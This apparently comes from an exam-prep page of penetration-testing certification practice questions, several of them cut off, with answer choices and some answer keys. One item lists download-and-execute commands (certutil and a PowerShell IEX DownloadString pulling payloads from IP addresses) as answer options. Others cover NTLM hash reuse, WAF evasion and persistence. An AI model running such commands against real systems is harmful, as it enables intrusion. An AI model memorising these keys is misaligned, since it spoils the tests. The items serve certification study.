Which of the following sections of the report would most likely contain this information?

A penetration tester is compiling the final report for a recently completed engagement. A junior QA team member wants to know where they can find details on the impact, overall security findings, and high-level statements. Which of the following sections of the report would most likely contain this information?

A. ...

March 22, 2025

Which of the following host-based attacks should the tester use?

During a security assessment for an internal corporate network, a penetration tester wants to gain unauthorized access to internal resources by executing an attack that uses software to disguise itself as legitimate software. Which of the following host-based attacks should the tester use?

A. On-path
B. Logic bomb
C. Rootkit
D. ...

March 20, 2025

Which of the following describes the type of assessment that should be considered in this scope of work?

During a penetration testing engagement, a tester targets the internet-facing services used by the client. Which of the following describes the type of assessment that should be considered in this scope of work?

A. Segmentation
B. Mobile
C. External
D. Web

Answer: C

Explanation: An external assessment focuses on testing...

March 19, 2025

Which of the following is the best way to avoid the WAF and gather information about the target company's systems?

A penetration tester cannot find information on the target company's systems using common OSINT methods. The tester's attempts to do reconnaissance against internet-facing resources have been blocked by the company's WAF. Which of the following is the best way to avoid the WAF and gather information about the target company's...

March 18, 2025

Which of the following tools should the penetration tester use to continue the attack?

During an assessment, a penetration tester obtains an NTLM hash from a legacy Windows machine. Which of the following tools should the penetration tester use to continue the attack?

A. Responder
B. Hydra
C. BloodHound
D. CrackMapExec

Answer: D

Explanation: When a penetration tester obtains an NTLM hash from a...

March 17, 2025

Which of the following techniques would be best for the tester to use?

As part of an engagement, a penetration tester wants to maintain access to a compromised system after rebooting. Which of the following techniques would be best for the tester to use?

A. Establishing a reverse shell
B. Executing a process injection attack
C. Creating a scheduled task
D. Performing a...

March 13, 2025

Which of the following elements in a lock should be aligned to a specific level to allow the key cylinder to turn?

Which of the following elements in a lock should be aligned to a specific level to allow the key cylinder to turn?

A. Latches
B. Pins
C. Shackle
D. Plug

Answer: B

Explanation: In a pin tumbler lock, the key interacts with a series of pins within the lock cylinder....

March 7, 2025

Which of the following attacks is the tester performing?

A penetration tester is evaluating a SCADA system. The tester receives local access to a workstation that is running a single application. While navigating through the application, the tester opens a terminal window and gains access to the underlying operating system. Which of the following attacks is the tester performing?

A...

March 6, 2025

Which of the following commands should the penetration tester use?

A penetration tester gains initial access to an endpoint and needs to execute a payload to obtain additional access. Which of the following commands should the penetration tester use?

A. powershell.exe impo C:\tools\foo.ps1
B. certutil.exe -f https://192.168.0.1/foo.exe bad.exe
C. powershell.exe -noni -encode IEX.Downloadstring("http://172.16.0.1/")
D. rundll32.exe c:\path\foo.dll,functName

Answer: B

Explanation: To...

March 4, 2025

A tester completed a report for a new client. Prior to sharing the report with the client, which of the following should the tester request to complete a review?

A tester completed a report for a new client. Prior to sharing the report with the client, which of the following should the tester request to complete a review?

A. A generative AI assistant
B. The customer's designated contact
C. A cybersecurity industry peer
D. A team member

Answer: D...

March 3, 2025